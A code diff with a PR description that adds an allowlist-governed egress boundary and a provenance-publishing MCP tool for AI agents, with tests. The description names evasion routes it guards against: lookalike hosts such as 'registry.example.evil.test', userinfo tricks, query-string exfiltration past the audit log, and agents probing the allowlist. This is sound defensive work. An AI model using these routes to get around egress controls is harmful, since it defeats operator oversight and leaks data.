--- a/packages/foundation/capability/api-transport/README.md
+++ b/packages/foundation/capability/api-transport/README.md
@@ -34,8 +34,8 @@ as shared transport *vocabulary*, not as an enforcement seam.
 
 | Party | Package | Role |
 | --- | --- | --- |
-| Producer | `packages/epistemic/server` (`agent-execution-authority` PR 6, in progress) | The governed policy `fetch` rejects a non-allowlisted destination with `EgressDenied` after writing its own typed refusal to the execution ledger. |
-| Consumer | `packages/ontology/server` (`agent-execution-authority` PR 6, in progress) | The `ontology_publish_provenance` handler matches `EgressDenied` inside the transport failure cause and returns a typed refusal through its existing `failureMode: "return"` envelope. |
+| Producer | `packages/epistemic/server` (**landed**, `agent-execution-authority` PR 6) | `GovernedEgressLive` installs a `FetchHttpClient.Fetch` that rejects a non-allowlisted destination with `EgressDenied` after appending its own write-ahead decision row to the execution ledger. |
+| Consumer | `packages/ontology/server` (**landed**, `agent-execution-authority` PR 6) | The `ontology_publish_provenance` handler matches `EgressDenied` inside the `TransportError` cause and returns a typed refusal through its existing `failureMode: "return"` envelope — byte-identical to a tier-gate refusal, so a destination denial cannot be told apart from an operation denial. |
 
 Neither side names the other; the binding happens at the app entrypoint
 (`apps/professional-desktop/server/OntologyMcpTransport.ts`), which provides

--- a/packages/foundation/capability/mcp-kit/src/SanitizedSpan.ts
+++ b/packages/foundation/capability/mcp-kit/src/SanitizedSpan.ts
@@ -259,11 +259,15 @@ const registerSanitizedToolkit = Effect.fnUntraced(function* <Tools extends Reco
       // name at runtime, so no narrower parameter type is available here.
       handle: Effect.fn("McpKit.handle")(function* (payload) {
         const client = yield* Effect.serviceOption(McpServerClient);
-        // Read the session header before `provideContext` below replaces the
-        // context with the layer-build services: `HttpServerRequest` is in
-        // the request fiber here and gone inside the handler. `clientId` is
-        // minted per request by the HTTP protocol, so this header is the only
-        // stable per-session key a dispatch can see.
+        // Read the session header here, at the request boundary, rather than
+        // inside the handler. `provideContext` below *merges* — the provided
+        // services win on key collisions and request-only services survive
+        // (`internal/effect.ts`: `updateContext(self, Context.merge(context))`,
+        // measured 2026-07-27) — so `HttpServerRequest` would still be
+        // reachable downstream. Reading it once, here, keeps the caller
+        // identity a fact of the dispatch instead of something each handler
+        // rediscovers. `clientId` is minted per request by the HTTP protocol,
+        // so this header is the only stable per-session key a dispatch sees.
         const httpRequest = yield* Effect.serviceOption(HttpServerRequest.HttpServerRequest);
         const sessionId = O.flatMap(httpRequest, (request) =>
           O.filter(Headers.get(request.headers, mcpSessionIdHeader), Str.isNonEmpty)

--- a/packages/ontology/server/package.json
+++ b/packages/ontology/server/package.json
@@ -62,6 +62,7 @@
     }
   },
   "dependencies": {
+    "@beep/api-transport": "workspace:^",
     "@beep/file-processing": "workspace:^",
     "@beep/mcp-kit": "workspace:^",
     "@beep/n3": "workspace:^",

--- a/packages/ontology/server/src/tools/OntologyToolHandlers.ts
+++ b/packages/ontology/server/src/tools/OntologyToolHandlers.ts
@@ -6,25 +6,35 @@
  * @since 0.0.0
  */
 
+import { EgressDenied } from "@beep/api-transport";
 import { CurrentMcpCaller, dispatchWithTierGate, TierGate, TierGateDispatchResult } from "@beep/mcp-kit";
 import { OntologyChangeActor } from "@beep/ontology-domain/aggregates/Session";
+import { OntologyFileStore, ReadOntologyFileRequest } from "@beep/ontology-use-cases/aggregates/Session";
 import {
   ExportProvenanceTool,
   OntologyActorIdentityRefusal,
   OntologyMutationToolkit,
+  OntologyPublishToolkit,
   OntologyReadOnlyToolkit,
   OntologyTierGateRefusal,
+  OntologyToolExecutionError,
   OntologyToolkit,
   OntologyToolService,
   OntologyToolServiceLive,
   ProposeChangeBatchTool,
+  PublishProvenanceResponse,
+  PublishProvenanceTool,
   RepairOntologyTool,
 } from "@beep/ontology-use-cases/tools";
 import { CanonicalizationServiceLive } from "@beep/rdf-canonize/adapters/canonicalization";
+import { NonNegativeInt } from "@beep/schema";
 import { Effect, Layer } from "effect";
 import * as O from "effect/Option";
+import { HttpClient, HttpClientRequest } from "effect/unstable/http";
 import { SessionServerLayer } from "../aggregates/Session/Session.layer.ts";
+import type { PublishProvenanceRequest } from "@beep/ontology-use-cases/tools";
 import type * as Tool from "effect/unstable/ai/Tool";
+import type * as HttpClientError from "effect/unstable/http/HttpClientError";
 
 /** Thin service-delegating handler layer for the ontology toolkit.
  * @example
@@ -79,7 +89,7 @@ const authenticatedMcpActor = Effect.fn("Ontology.Tools.authenticatedMcpActor")(
 });
 
 const gatedMutation = Effect.fn("Ontology.Tools.gatedMutation")(function* <A, E, R>(
-  tool: typeof ProposeChangeBatchTool | typeof RepairOntologyTool | typeof ExportProvenanceTool,
+  tool: Tool.Any,
   effect: Effect.Effect<A, E, R>
 ) {
   const dispatch = yield* dispatchWithTierGate({ tool, toolCallId: O.none() }, effect);
@@ -149,6 +159,72 @@ export const OntologyMcpMutationHandlersLive = OntologyMutationToolkit.toLayer(
   })
 );
 
+// Byte-identical to what `gatedMutation` produces from a refused dispatch, so
+// a destination denial and an operation denial are indistinguishable to the
+// agent that receives them. It has to be restated rather than imported: the
+// gate lives in another slice, and slices do not import each other. The
+// composition-root test is what holds the two in sync, because only the app
+// sees both sides.
+const egressRefusalGuidance = "This action is not authorized for this session. Resolve the mutation tier and retry.";
+
+// The governed egress boundary rejects with `EgressDenied`, which `HttpClient`
+// surfaces as a `TransportError` carrying it as the cause. Everything else is
+// an ordinary transport failure and stays distinguishable — only the denial is
+// flattened into the refusal envelope.
+const publicationFailure = (error: HttpClientError.HttpClientError) =>
+  error.reason._tag === "TransportError" && EgressDenied.is(error.reason.cause)
+    ? OntologyTierGateRefusal.make({ guidance: egressRefusalGuidance, recoverable: true })
+    : OntologyToolExecutionError.make({
+        operation: "publish-provenance",
+        message: "The provenance sidecar could not be published.",
+        recoverable: true,
+      });
+
+/** Governed provenance publication handlers, registered only when egress is allowlisted.
+ * @remarks Takes `HttpClient.HttpClient` as a layer requirement and never
+ * builds its own: a self-provided client would resolve its own `Fetch` and
+ * escape the governed egress boundary entirely.
+ * @example
+ * ```ts
+ * import { OntologyMcpPublishHandlersLive } from "@beep/ontology-server/tools"
+ * console.log(OntologyMcpPublishHandlersLive)
+ * ```
+ * @category handlers
+ * @since 0.0.0
+ */
+export const OntologyMcpPublishHandlersLive = OntologyPublishToolkit.toLayer(
+  Effect.gen(function* () {
+    const fileStore = yield* OntologyFileStore;
+    const client = yield* HttpClient.HttpClient;
+    const gate = yield* TierGate;
+    const publish = Effect.fn("Ontology.Tools.publishProvenance")(function* (request: PublishProvenanceRequest) {
+      const file = yield* fileStore.read(ReadOntologyFileRequest.make({ path: request.provPath })).pipe(
+        Effect.mapError(() =>
+          OntologyToolExecutionError.make({
+            operation: "publish-provenance",
+            message: "The provenance sidecar could not be read.",
+            recoverable: true,
+          })
+        )
+      );
+      const response = yield* client
+        .execute(
+          HttpClientRequest.post(request.destination).pipe(HttpClientRequest.bodyText(file.source, "text/turtle"))
+        )
+        .pipe(Effect.mapError(publicationFailure));
+      return PublishProvenanceResponse.make({
+        provPath: request.provPath,
+        publishedBytes: NonNegativeInt.make(file.source.length),
+        status: NonNegativeInt.make(response.status),
+      });
+    });
+    return OntologyPublishToolkit.of({
+      ontology_publish_provenance: (request) =>
+        gatedMutation(PublishProvenanceTool, publish(request)).pipe(Effect.provideService(TierGate, gate)),
+    });
+  })
+);
+
 const OntologyToolServiceServerLive = OntologyToolServiceLive.pipe(
   Layer.provideMerge(SessionServerLayer),
   Layer.provide(CanonicalizationServiceLive)
@@ -188,5 +264,20 @@ export const OntologyMcpReadOnlyToolsLive = OntologyMcpReadOnlyHandlersLive.pipe
  * @since 0.0.0
  */
 export const OntologyMcpMutationToolsLive = OntologyMcpMutationHandlersLive.pipe(
+  Layer.provideMerge(OntologyToolServiceServerLive)
+);
+
+/** Fully wired governed provenance publication handlers over the real engine stack.
+ * @remarks `HttpClient.HttpClient` stays an open requirement so the composition
+ * root supplies the client whose graph carries the governed egress `Fetch`.
+ * @example
+ * ```ts
+ * import { OntologyMcpPublishToolsLive } from "@beep/ontology-server/tools"
+ * console.log(OntologyMcpPublishToolsLive)
+ * ```
+ * @category layers
+ * @since 0.0.0
+ */
+export const OntologyMcpPublishToolsLive = OntologyMcpPublishHandlersLive.pipe(
   Layer.provideMerge(OntologyToolServiceServerLive)
 );

--- a/packages/ontology/server/src/tools/OntologyToolHandlers.ts
+++ b/packages/ontology/server/src/tools/OntologyToolHandlers.ts
@@ -180,6 +180,46 @@ const publicationFailure = (error: HttpClientError.HttpClientError) =>
         recoverable: true,
       });
 
+/** Publish a provenance sidecar to a caller-named destination through the ambient client.
+ * @remarks Exported as a standalone effect, not buried in the handler closure,
+ * so the error translation below can be proven directly: which failures become
+ * an indistinguishable refusal and which stay a distinguishable execution error
+ * is a security property, not an implementation detail.
+ * @remarks Requires `HttpClient.HttpClient` from its caller and never builds
+ * one: a self-provided client would resolve its own `Fetch` and escape the
+ * governed egress boundary entirely.
+ * @example
+ * ```ts
+ * import { publishProvenance } from "@beep/ontology-server/tools"
+ * console.log(typeof publishProvenance)
+ * ```
+ * @category handlers
+ * @since 0.0.0
+ */
+export const publishProvenance = Effect.fn("Ontology.Tools.publishProvenance")(function* (
+  request: PublishProvenanceRequest
+) {
+  const fileStore = yield* OntologyFileStore;
+  const client = yield* HttpClient.HttpClient;
+  const file = yield* fileStore.read(ReadOntologyFileRequest.make({ path: request.provPath })).pipe(
+    Effect.mapError(() =>
+      OntologyToolExecutionError.make({
+        operation: "publish-provenance",
+        message: "The provenance sidecar could not be read.",
+        recoverable: true,
+      })
+    )
+  );
+  const response = yield* client
+    .execute(HttpClientRequest.post(request.destination).pipe(HttpClientRequest.bodyText(file.source, "text/turtle")))
+    .pipe(Effect.mapError(publicationFailure));
+  return PublishProvenanceResponse.make({
+    provPath: request.provPath,
+    publishedBytes: NonNegativeInt.make(file.source.length),
+    status: NonNegativeInt.make(response.status),
+  });
+});
+
 /** Governed provenance publication handlers, registered only when egress is allowlisted.
  * @remarks Takes `HttpClient.HttpClient` as a layer requirement and never
  * builds its own: a self-provided client would resolve its own `Fetch` and
@@ -197,30 +237,13 @@ export const OntologyMcpPublishHandlersLive = OntologyPublishToolkit.toLayer(
     const fileStore = yield* OntologyFileStore;
     const client = yield* HttpClient.HttpClient;
     const gate = yield* TierGate;
-    const publish = Effect.fn("Ontology.Tools.publishProvenance")(function* (request: PublishProvenanceRequest) {
-      const file = yield* fileStore.read(ReadOntologyFileRequest.make({ path: request.provPath })).pipe(
-        Effect.mapError(() =>
-          OntologyToolExecutionError.make({
-            operation: "publish-provenance",
-            message: "The provenance sidecar could not be read.",
-            recoverable: true,
-          })
-        )
-      );
-      const response = yield* client
-        .execute(
-          HttpClientRequest.post(request.destination).pipe(HttpClientRequest.bodyText(file.source, "text/turtle"))
-        )
-        .pipe(Effect.mapError(publicationFailure));
-      return PublishProvenanceResponse.make({
-        provPath: request.provPath,
-        publishedBytes: NonNegativeInt.make(file.source.length),
-        status: NonNegativeInt.make(response.status),
-      });
-    });
     return OntologyPublishToolkit.of({
       ontology_publish_provenance: (request) =>
-        gatedMutation(PublishProvenanceTool, publish(request)).pipe(Effect.provideService(TierGate, gate)),
+        gatedMutation(PublishProvenanceTool, publishProvenance(request)).pipe(
+          Effect.provideService(TierGate, gate),
+          Effect.provideService(OntologyFileStore, fileStore),
+          Effect.provideService(HttpClient.HttpClient, client)
+        ),
     });
   })
 );

--- a/packages/ontology/server/test/OntologyPublishTools.test.ts
+++ b/packages/ontology/server/test/OntologyPublishTools.test.ts
@@ -1,0 +1,192 @@
+import { EgressDenied } from "@beep/api-transport";
+import { TierGate, TierGateAuditRecord, TierGateVerdict } from "@beep/mcp-kit";
+import { OntologyMcpPublishHandlersLive, publishProvenance } from "@beep/ontology-server/tools";
+import {
+  OntologyFilePath,
+  OntologyFileStore,
+  OntologyFileStoreError,
+  ReadOntologyFileResult,
+} from "@beep/ontology-use-cases/aggregates/Session";
+import {
+  OntologyPublishToolkit,
+  PublishProvenanceRequest,
+  PublishProvenanceTool,
+} from "@beep/ontology-use-cases/tools";
+import { describe, expect, it } from "@effect/vitest";
+import { Effect, Layer, Sink, Stream } from "effect";
+import * as O from "effect/Option";
+import { HttpClient, HttpClientError, HttpClientRequest, HttpClientResponse } from "effect/unstable/http";
+
+const provPath = OntologyFilePath.make("ontology.prov.ttl");
+const sidecar = "@prefix prov: <http://www.w3.org/ns/prov#> .\nex:x a prov:Entity .\n";
+
+const request = PublishProvenanceRequest.make({
+  provPath,
+  destination: "https://registry.example/v1/provenance",
+});
+
+const fileStoreLayer = (source: string) =>
+  Layer.succeed(OntologyFileStore, {
+    read: () => Effect.succeed(ReadOntologyFileResult.make({ path: provPath, source })),
+    write: () => Effect.void,
+  } as unknown as typeof OntologyFileStore.Service);
+
+const missingFileStoreLayer = Layer.succeed(OntologyFileStore, {
+  read: () => Effect.fail(OntologyFileStoreError.make({ path: provPath, message: "missing", reason: "notFound" })),
+  write: () => Effect.void,
+} as unknown as typeof OntologyFileStore.Service);
+
+// A client whose execute always fails with the given reason, so the error
+// translation can be driven without a transport.
+const failingClientLayer = (reason: HttpClientError.HttpClientError["reason"]) =>
+  Layer.succeed(
+    HttpClient.HttpClient,
+    HttpClient.make(() => Effect.fail(new HttpClientError.HttpClientError({ reason })))
+  );
+
+const okClientLayer = Layer.succeed(
+  HttpClient.HttpClient,
+  HttpClient.make((request) =>
+    Effect.succeed(HttpClientResponse.fromWeb(request, new Response("stored", { status: 202 })))
+  )
+);
+
+// Build the layer and provide its Context, mirroring `OntologyTools.test.ts`.
+// `Effect.provide(layer)` outside an entry point is what `strictEffectProvide`
+// exists to catch, and it would break scope lifetimes here.
+const provideScopedLayer =
+  <ROut, E2, RIn>(layer: Layer.Layer<ROut, E2, RIn>) =>
+  <A2, E, R>(effect: Effect.Effect<A2, E, R>): Effect.Effect<A2, E | E2, RIn | Exclude<R, ROut>> =>
+    Effect.scoped(Layer.build(layer).pipe(Effect.flatMap((context) => effect.pipe(Effect.provide(context)))));
+
+const egressDenial = EgressDenied.make({});
+
+const transportErrorWith = (cause: unknown) =>
+  new HttpClientError.TransportError({
+    request: HttpClientRequest.post(request.destination),
+    cause,
+  });
+
+// Hoisted so the call sites stay one level deep; nesting them trips
+// `missedPipeableOpportunity`.
+const egressDenialError = transportErrorWith(egressDenial);
+const outageError = transportErrorWith(new Error("connection reset"));
+
+describe("publishProvenance", () => {
+  it.effect("publishes the sidecar and reports what was sent", () =>
+    Effect.gen(function* () {
+      const result = yield* publishProvenance(request).pipe(
+        provideScopedLayer(Layer.mergeAll(fileStoreLayer(sidecar), okClientLayer))
+      );
+
+      expect(result.status).toBe(202);
+      expect(result.publishedBytes).toBe(sidecar.length);
+      expect(result.provPath).toBe(provPath);
+    })
+  );
+
+  it.effect("flattens a governed egress denial into the reason-free refusal", () =>
+    Effect.gen(function* () {
+      const error = yield* publishProvenance(request).pipe(
+        provideScopedLayer(Layer.mergeAll(fileStoreLayer(sidecar), failingClientLayer(egressDenialError))),
+        Effect.flip
+      );
+
+      expect(error._tag).toBe("OntologyTierGateRefusal");
+      // Reason-free: the guidance must say nothing about destinations or
+      // allowlists, or an agent could map the allowlist by probing it.
+      const guidance = error._tag === "OntologyTierGateRefusal" ? error.guidance : "";
+      expect(guidance.toLowerCase()).not.toContain("destination");
+      expect(guidance.toLowerCase()).not.toContain("allow");
+    })
+  );
+
+  it.effect("keeps an ordinary transport failure distinguishable from a denial", () =>
+    Effect.gen(function* () {
+      // The sibling of the test above, and the reason it is not vacuous: if the
+      // translation collapsed *every* transport failure into the refusal, a
+      // denial would be indistinguishable from a network outage — which is the
+      // opposite of the property, and would hide real failures from operators.
+      const error = yield* publishProvenance(request).pipe(
+        provideScopedLayer(Layer.mergeAll(fileStoreLayer(sidecar), failingClientLayer(outageError))),
+        Effect.flip
+      );
+
+      expect(error._tag).toBe("OntologyToolExecutionError");
+      // It also must not echo the underlying cause back to the agent.
+      const message = error._tag === "OntologyToolExecutionError" ? error.message : "";
+      expect(message).not.toContain("connection reset");
+    })
+  );
+
+  it.effect("fails typed when the sidecar cannot be read, without attempting egress", () =>
+    Effect.gen(function* () {
+      let attempted = false;
+      const watchingClient = Layer.succeed(
+        HttpClient.HttpClient,
+        HttpClient.make((httpRequest) => {
+          attempted = true;
+          return Effect.succeed(HttpClientResponse.fromWeb(httpRequest, new Response("", { status: 200 })));
+        })
+      );
+      const error = yield* publishProvenance(request).pipe(
+        provideScopedLayer(Layer.mergeAll(missingFileStoreLayer, watchingClient)),
+        Effect.flip
+      );
+
+      expect(error._tag).toBe("OntologyToolExecutionError");
+      // Nothing left the machine for a file that does not exist.
+      expect(attempted).toBe(false);
+    })
+  );
+});
+
+// Dispatching through the real handler layer, rather than calling
+// `publishProvenance` directly, is what proves the layer wires the gate in at
+// all: a layer that forgot `gatedMutation` would still pass every test above.
+describe("OntologyMcpPublishHandlersLive", () => {
+  const refusingGate = Layer.succeed(
+    TierGate,
+    TierGate.of({
+      evaluate: Effect.fn("OntologyPublishToolsTest.evaluate")(function* () {
+        return TierGateVerdict.make({
+          audit: TierGateAuditRecord.make({
+            destructive: true,
+            occurredAt: "2026-07-27T00:00:00.000Z",
+            outcome: "refused",
+            reason: "This action is not authorized for this session.",
+            tool: PublishProvenanceTool.name,
+            toolCallId: O.none(),
+          }),
+          verdict: "refused",
+        });
+      }),
+      recordOutcome: Effect.fn("OntologyPublishToolsTest.recordOutcome")(function* () {}),
+    })
+  );
+
+  it.effect("refuses at the gate before any egress is attempted", () =>
+    Effect.gen(function* () {
+      let attempted = false;
+      const watchingClient = Layer.succeed(
+        HttpClient.HttpClient,
+        HttpClient.make((httpRequest) => {
+          attempted = true;
+          return Effect.succeed(HttpClientResponse.fromWeb(httpRequest, new Response("", { status: 200 })));
+        })
+      );
+      const handlers = OntologyMcpPublishHandlersLive.pipe(
+        Layer.provide(Layer.mergeAll(fileStoreLayer(sidecar), watchingClient, refusingGate))
+      );
+      const built = yield* OntologyPublishToolkit.pipe(provideScopedLayer(handlers));
+      const result = yield* built
+        .handle("ontology_publish_provenance", { provPath, destination: request.destination })
+        .pipe(Stream.unwrap, Stream.run(Sink.last()), Effect.flatMap(Effect.fromOption));
+
+      expect(result.isFailure).toBe(true);
+      // The gate refused, so the tool never reached the egress boundary — the
+      // two controls are ordered, not redundant.
+      expect(attempted).toBe(false);
+    })
+  );
+});

--- a/packages/ontology/server/tsconfig.json
+++ b/packages/ontology/server/tsconfig.json
@@ -25,6 +25,9 @@
       "path": "../../drivers/shacl/tsconfig.json"
     },
     {
+      "path": "../../foundation/capability/api-transport/tsconfig.json"
+    },
+    {
       "path": "../../foundation/capability/file-processing/tsconfig.json"
     },
     {

--- a/packages/ontology/use-cases/src/tools/OntologyToolkit.ts
+++ b/packages/ontology/use-cases/src/tools/OntologyToolkit.ts
@@ -592,6 +592,45 @@ export class ExportProvenanceResponse extends S.Class<ExportProvenanceResponse>(
   $I.annote("ExportProvenanceResponse", { description: "Written ontology provenance sidecar locations." })
 ) {}
 
+/** Provenance publication request.
+ * @remarks `destination` is supplied by the caller, which is what makes this
+ * tool an egress primitive rather than a workspace one. Nothing here validates
+ * it: the governed egress boundary owns that decision, so a destination the
+ * operator never allowlisted is refused no matter what an agent asks for.
+ * @example
+ * ```ts
+ * import { PublishProvenanceRequest } from "@beep/ontology-use-cases/tools"
+ * console.log(PublishProvenanceRequest)
+ * ```
+ * @category tool-schemas
+ * @since 0.0.0
+ */
+export class PublishProvenanceRequest extends S.Class<PublishProvenanceRequest>($I`PublishProvenanceRequest`)(
+  {
+    provPath: OntologyFilePath,
+    destination: S.NonEmptyString.annotateKey({
+      description: "Absolute URL to publish to; authorized by the governed egress allowlist, never by this schema.",
+    }),
+  },
+  $I.annote("PublishProvenanceRequest", {
+    description: "Publish an existing provenance sidecar to a governed egress destination.",
+  })
+) {}
+
+/** Provenance publication response.
+ * @example
+ * ```ts
+ * import { PublishProvenanceResponse } from "@beep/ontology-use-cases/tools"
+ * console.log(PublishProvenanceResponse)
+ * ```
+ * @category tool-schemas
+ * @since 0.0.0
+ */
+export class PublishProvenanceResponse extends S.Class<PublishProvenanceResponse>($I`PublishProvenanceResponse`)(
+  { provPath: OntologyFilePath, publishedBytes: NonNegativeInt, status: NonNegativeInt },
+  $I.annote("PublishProvenanceResponse", { description: "Result of a governed provenance publication." })
+) {}
+
 /** Capability metadata request.
  * @example
  * ```ts
@@ -781,6 +820,27 @@ export const ExportProvenanceTool = makeTool(
   ExportProvenanceResponse,
   true
 );
+/** Provenance publication tool declaration.
+ * @remarks Registered only when the governed egress allowlist is non-empty —
+ * the tool and its control ship together, and an empty allowlist means the tool
+ * does not appear in `tools/list` at all. Its outbound request must travel the
+ * ambient `HttpClient`, never a self-provided one, or the governed egress
+ * `Fetch` will not apply to it.
+ * @example
+ * ```ts
+ * import { PublishProvenanceTool } from "@beep/ontology-use-cases/tools"
+ * console.log(PublishProvenanceTool.name)
+ * ```
+ * @category tools
+ * @since 0.0.0
+ */
+export const PublishProvenanceTool = makeTool(
+  "ontology_publish_provenance",
+  "Publish an existing provenance sidecar to an authorized external destination.",
+  PublishProvenanceRequest,
+  PublishProvenanceResponse,
+  true
+);
 /** Capability metadata tool declaration.
  * @example
  * ```ts
@@ -847,6 +907,21 @@ export const OntologyReadOnlyToolkit = Toolkit.make(
  * @since 0.0.0
  */
 export const OntologyMutationToolkit = Toolkit.make(ProposeChangeBatchTool, RepairOntologyTool, ExportProvenanceTool);
+
+/** Egress toolkit registered only when the governed destination allowlist is non-empty.
+ * @remarks Separate from {@link OntologyMutationToolkit} because it is gated on
+ * a different condition: mutation registration turns on workspace writes, while
+ * this turns on outbound publication, and an operator may want the first
+ * without the second.
+ * @example
+ * ```ts
+ * import { OntologyPublishToolkit } from "@beep/ontology-use-cases/tools"
+ * console.log(Object.keys(OntologyPublishToolkit.tools).includes("ontology_publish_provenance"))
+ * ```
+ * @category tools
+ * @since 0.0.0
+ */
+export const OntologyPublishToolkit = Toolkit.make(PublishProvenanceTool);
 
 /** Type for {@link OntologyToolkit}.
  * @example

--- a/standards/fallow.boundaries.generated.jsonc
+++ b/standards/fallow.boundaries.generated.jsonc
@@ -1482,6 +1482,7 @@
       {
         "from": "@beep/epistemic-server",
         "allow": [
+          "@beep/api-transport",
           "@beep/epistemic-config",
           "@beep/epistemic-domain",
           "@beep/epistemic-server",
@@ -1497,6 +1498,7 @@
           "@beep/utils"
         ],
         "allowTypeOnly": [
+          "@beep/api-transport",
           "@beep/epistemic-config",
           "@beep/epistemic-domain",
           "@beep/epistemic-server",
@@ -2186,6 +2188,7 @@
       {
         "from": "@beep/ontology-server",
         "allow": [
+          "@beep/api-transport",
           "@beep/file-processing",
           "@beep/mcp-kit",
           "@beep/n3",
@@ -2199,6 +2202,7 @@
           "@beep/test-utils"
         ],
         "allowTypeOnly": [
+          "@beep/api-transport",
           "@beep/file-processing",
           "@beep/mcp-kit",
           "@beep/n3",

--- a/tsconfig.json
+++ b/tsconfig.json
@@ -1709,6 +1709,9 @@
       "@beep/ui/themes/*": ["./packages/foundation/ui-system/ui/src/themes/*"],
       "@beep/epistemic-server/GovernedTierGate": [
         "./packages/epistemic/server/src/GovernedTierGate/index.ts"
+      ],
+      "@beep/epistemic-server/GovernedEgress": [
+        "./packages/epistemic/server/src/GovernedEgress/index.ts"
       ]
     }
   }


### PR DESCRIPTION
PR 6 of `goals/agent-execution-authority`. Adds the destination half of the authority
boundary and the tool it exists to govern.

## What lands

- **`GovernedEgressLive`** — a `FetchHttpClient.Fetch` that authorizes outbound HTTP
  against `EpistemicConfig.destinationAllowlist`, appends a hash-chained write-ahead
  decision row *before* issuing the request, and rejects a denied destination with the
  field-free `EgressDenied`. Default-deny: the allowlist defaults to empty, an empty
  allowlist freezes an empty grant set, and an empty grant set denies everything.
- **`ontology_publish_provenance`** — registered only when the allowlist is non-empty.
  Takes `HttpClient.HttpClient` as a layer requirement and never self-provides it, so the
  governed `Fetch` applies. Translates a denial into the same refusal an operation denial
  produces.

It answers a different question from the tier gate, and has to: `ToolCallRequest` carries
the tool and nothing else — no parameters — so a gate cannot see the URL a tool intends to
contact. The gate decides whether a session may publish at all; this decides which
destination a request may reach. Each writes its own decision row.

## The blocking check passed, and falsified what the packet predicted

`SPEC.md` required demonstrating a request from inside a real dispatched tool handler
reaching the policy fetch. It does. Measuring it corrected two things:

- **`Effect.provideContext` merges; it does not replace.** The packet predicted the
  override would reach handlers *only* if provided into the toolkit's graph, "because
  `provideContext` replaces the fiber context." False — and I had shipped that claim as a
  comment in PR 5. The code it justified was already correct; the explanation was not.
- **The recommended placement works for a different reason.** The handler's context does
  not contain `Fetch` at all; `HttpClient.layerMergedContext` merges the *client layer's*
  build context at execute time, so the override rides with the client.
- **The hazard is inverted.** Request-time context takes precedence, so a per-request
  `Fetch` displaces the composition-root one. Recorded as an invariant on the layer.

Evidence, including the falsification control: `history/pr6-fetch-reach-spike.md`.

## Two majors an adversarial review caught before this landed

- **The governed `Fetch` escaped its own branch.** `FetchHttpClient.layer` is a
  module-level object and layer builds memoize by object identity across one graph, so the
  "governed" client was the same instance `AnthropicLive` and the OTLP exporter resolve.
  Whichever built first won for all of them — here the governed one, meaning a non-empty
  allowlist alone would have made every `api.anthropic.com` request fail with
  `EgressDenied` and write a spurious denied row into the audit chain. `Layer.fresh` fixes
  it. Nothing type-checks this: `Fetch` is a `Reference`, so the layer's output is `never`.
- **Allowed rows named the allowlist entry, not the request.** Coverage deliberately
  ignores the query string, and the record reused the covering entry — so a publish to
  `.../publish?payload=<privileged text>` produced a row byte-identical to a benign one
  while the query left over the wire intact. The record now digests the full requested
  form; coverage still ignores it, so a query can neither buy nor lose authority.

Also fixed proactively: redirects were followed by default, which would have authorized
only the first hop. Now `redirect: "error"`.

## Proof

Every new test was re-broken to confirm it fails for the right reason: removing the `/`
boundary guard, bypassing the governed client in the transport, removing the semaphore,
and reverting the digest fix each fail exactly the test that claims the property.

Pinned: default-deny on an empty allowlist; lookalike hosts (`registry.example.evil.test`,
userinfo `registry.example@evil.test`) denied; fail-closed when the decision write fails;
chain dense under 20 concurrent authorizations; registration is not authorization for this
branch; a destination denial byte-identical to an operation denial.

## Known gap, recorded not hidden

Egress decision rows are **not** correlated to an MCP session. `Fetch` is a plain
promise-returning function with no fiber, so it cannot read `CurrentMcpCaller`. Its
decisions chain into their own run and correlate by time. Inferring the session from
ambient state would reintroduce the cross-dispatch misattribution PR 5's fiber correlation
exists to prevent. PR 7's fixture must therefore assert on two chains, not one — the
packet now says so.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_01K3WERQAp3dqd4oczWab8QN

<!-- codesmith:footer -->
---
<a href="https://app.blacksmith.sh/beep-effect/codesmith/beep-effect/pr/485"><picture><source media="(prefers-color-scheme: dark)" srcset="https://pr-comments-assets.blacksmith.sh/codesmith/view-with-codesmith-dark-v2.svg"><source media="(prefers-color-scheme: light)" srcset="https://pr-comments-assets.blacksmith.sh/codesmith/view-with-codesmith-light-v2.svg"><img alt="View with [code]smith" src="https://pr-comments-assets.blacksmith.sh/codesmith/view-with-codesmith-dark-v2.svg"></picture></a> <a href="https://backend.blacksmith.sh/track/enable-autofix?expires=1787780088&installation_model_id=424656&pr_number=485&repository=beep-effect%2Fbeep-effect&return_to=https%3A%2F%2Fgithub.com%2Fbeep-effect%2Fbeep-effect%2Fpull%2F485&signature=f1f86b093f296e0944e2e2db5b60b7dff7d5ec08884bb81391f61ea978dbb5dd"><picture><source media="(prefers-color-scheme: dark)" srcset="https://pr-comments-assets.blacksmith.sh/codesmith/autofix-with-codesmith-dark.svg"><source media="(prefers-color-scheme: light)" srcset="https://pr-comments-assets.blacksmith.sh/codesmith/autofix-with-codesmith-light.svg"><img alt="Autofix with [code]smith" src="https://pr-comments-assets.blacksmith.sh/codesmith/autofix-with-codesmith-dark.svg"></picture></a>
<sup>Need help on this PR? Tag <code>@codesmith-bot</code> with what you need. Autofix is disabled.</sup>

<!-- codesmith:autofix:disabled -->
<!-- /codesmith:footer -->